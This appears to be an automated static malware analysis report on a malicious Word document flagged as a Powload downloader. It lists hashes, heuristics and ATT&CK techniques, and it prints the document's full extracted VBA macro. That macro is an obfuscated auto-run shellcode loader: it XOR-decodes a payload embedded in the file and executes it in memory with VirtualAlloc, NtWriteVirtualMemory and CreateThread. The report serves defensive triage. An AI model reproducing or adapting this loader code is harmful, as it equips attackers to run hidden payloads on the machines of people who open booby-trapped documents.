Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3f55f22d80156038…

MALICIOUS

Office (OLE)

206.0 KB Created: 2017-07-24 18:25:00 Authoring application: Microsoft Office Word First seen: 2018-03-04
MD5: 08b21b36daadf106c884f77f2dc7307a SHA-1: c9334620838746474aa611d3786000834d659f9e SHA-256: 3f55f22d80156038bae31ba6040ff33bbab375d091903f5b4ed4ddfce6627151
180 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample is a malicious Microsoft Word document that leverages CVE-2007-3899, a memory corruption vulnerability, to achieve code execution. The embedded VBA macro utilizes Windows API functions like VirtualAlloc, indicating an attempt to allocate memory for and execute shellcode. This is further supported by the ClamAV detection of 'Doc.Downloader.Powload-6809817-0', suggesting the document's primary purpose is to download and execute a secondary payload.

Heuristics 8

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        eezpwH
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4530 bytes
SHA-256: 3dcbab8c3ebe67842d18bfe23aab4528c7403fe985a85c55508006917eeee6ff
Detection
ClamAV: No threats found
Obfuscation or payload: likely
37 of 73 identifiers look randomly generated (e.g. 'BNaoZnZvnrPYtQzAeqHSvSmroRBISydbHEvYcZzc') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function fhKRMyHfCv Lib "kernel32" Alias "CreateThread" (ByVal fQpMpbtYlIfxbSRRmrywyRN As Long, ByVal PpQrqw As Long, ByVal feztkYPMJJNrCdNdLe As LongPtr, UCIlnocnXZ As Long, ByVal bIPgZtByHT As Long, FONLzlYbmemeCZwS As Long) As LongPtr
Private Declare PtrSafe Function uBmxsw Lib "kernel32" Alias "VirtualAlloc" (ByVal AeNjkGIRgtLABZAhh As Long, ByVal rsvlWuyAJvcknslTexd As LongPtr, ByVal ucFgxBKkxeYrGrlneoisKKXmP As Long, ByVal ftpHVddqjpNpNvKodExKDVhYPPpK As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal KfsqBvqU As LongPtr, ByVal jUnqiVzPBMIvHtOfskmqSfOt As LongPtr, ByVal zkuYlZtuo As String, ByVal CwmNlyanCbLcLD As LongPtr, ByRef jkeDWdgUhI As LongPtr) As LongPtr
#Else
Private Declare Function fhKRMyHfCv Lib "kernel32" Alias "CreateThread"  (ByVal fQpMpbtYlIfxbSRRmrywyRN As Long, ByVal PpQrqw As Long, ByVal feztkYPMJJNrCdNdLe As Long, UCIlnocnXZ As Long, ByVal bIPgZtByHT As Long, FONLzlYbmemeCZwS As Long) As Long
Private Declare Function uBmxsw Lib "kernel32" Alias "VirtualAlloc" (ByVal AeNjkGIRgtLABZAhh As Long, ByVal rsvlWuyAJvcknslTexd As Long, ByVal ucFgxBKkxeYrGrlneoisKKXmP As Long, ByVal ftpHVddqjpNpNvKodExKDVhYPPpK As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal KfsqBvqU As Long, ByVal jUnqiVzPBMIvHtOfskmqSfOt As Long, ByVal zkuYlZtuo As String, ByVal CwmNlyanCbLcLD As Long, ByRef jkeDWdgUhI As Long) As Long
#End If

Const EkTpVDtK = &H1000
Const DteCHrVDcYikbF = &H40

Public Sub eezpwH()
    Dim sIwGenldOsBfyGqkaIvRcDeB() As Byte

    sIwGenldOsBfyGqkaIvRcDeB = guTbhWRqfCPCEDSKgz(ActiveDocument.FullName)
    Dim rVZcmmhlxyusKCS As String
    rVZcmmhlxyusKCS = StrConv(sIwGenldOsBfyGqkaIvRcDeB, 64)
    
    Dim AYAJKk
    AYAJKk = Split(rVZcmmhlxyusKCS, "BNaoZnZvnrPYtQzAeqHSvSmroRBISydbHEvYcZzcTIwDLeavxCmDhCGJAJZiMrDPnNqOvAyeQFYMwJGkRfk")

    Dim NUzGaQMPEVlNslb As String
    Dim AQywtoRjnRciAxajkacAGSZSO As String
    Dim oyqyhuRqbYdikDTXlv As String
    AQywtoRjnRciAxajkacAGSZSO = StrConv(StrConv(AYAJKk(UBound(AYAJKk)), 64), 128)
    oyqyhuRqbYdikDTXlv = Mid$(AQywtoRjnRciAxajkacAGSZSO, 3, Len(AQywtoRjnRciAxajkacAGSZSO))

    NUzGaQMPEVlNslb = EeIuByO("lAUfYLytZrqCfGqX", oyqyhuRqbYdikDTXlv)
    
    #If VBA7 Then
        Dim PQQjzNUBYjVQtE As LongPtr
        Dim QaFJnYDUwKYeyzOWDF As LongPtr
    #Else
        Dim PQQjzNUBYjVQtE As Long
        Dim QaFJnYDUwKYeyzOWDF As Long
    #End If

    PQQjzNUBYjVQtE = uBmxsw(0, Len(NUzGaQMPEVlNslb), EkTpVDtK, DteCHrVDcYikbF)
    QaFJnYDUwKYeyzOWDF = NtWriteVirtualMemory(-1, PQQjzNUBYjVQtE, NUzGaQMPEVlNslb, Len(NUzGaQMPEVlNslb), 0)
    QaFJnYDUwKYeyzOWDF = fhKRMyHfCv(0, 0, PQQjzNUBYjVQtE, 0, 0, 0)
End Sub

Public Function guTbhWRqfCPCEDSKgz(ByVal iNFgvKJPxy As String) As Byte()
    Dim AQywtoRjnRciAxajkacAGSZSO As Long
    Dim oyqyhuRqbYdikDTXlv() As Byte
    AQywtoRjnRciAxajkacAGSZSO = FreeFile
    If LenB(Dir(iNFgvKJPxy)) Then
        Open iNFgvKJPxy For Binary Access Read As AQywtoRjnRciAxajkacAGSZSO
        ReDim oyqyhuRqbYdikDTXlv(LOF(AQywtoRjnRciAxajkacAGSZSO) - 1&) As Byte
        Get AQywtoRjnRciAxajkacAGSZSO, , oyqyhuRqbYdikDTXlv
        Close AQywtoRjnRciAxajkacAGSZSO
    Else
        Err.Raise 53
    End If
    guTbhWRqfCPCEDSKgz = oyqyhuRqbYdikDTXlv
    Erase oyqyhuRqbYdikDTXlv
End Function

Public Sub Document_Open()
    eezpwH
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function EeIuByO(YjIRGHRatSPJIq As String, vbfcQzHJGE As String) As String
    Dim jxFdPZsZThthxAsCAevLxoT As Long
    Dim tvwYVqzbmTx As String
    Dim updQrIxdcUIBxW As Integer, UxCORoWNgPDngCAptAiFSqgGWPUH As Integer, a As Long

    For jxFdPZsZThthxAsCAevLxoT = 1 To Len(vbfcQzHJGE)
        a = jxFdPZsZThthxAsCAevLxoT Mod Len(YjIRGHRatSPJIq)
        If a = 0 Then a = Len(YjIRGHRatSPJIq)
        
        updQrIxdcUIBxW = Asc(Mid$(vbfcQzHJGE, jxFdPZsZThthxAsCAevLxoT, 1))
        UxCORoWNgPDngCAptAiFSqgGWPUH = Asc(Mid$(YjIRGHRatSPJIq, a, 1))
        tvwYVqzbmTx = tvwYVqzbmTx + Chr(updQrIxdcUIBxW Xor UxCORoWNgPDngCAptAiFSqgGWPUH)
    Next jxFdPZsZThthxAsCAevLxoT
    
   EeIuByO = tvwYVqzbmTx
End Function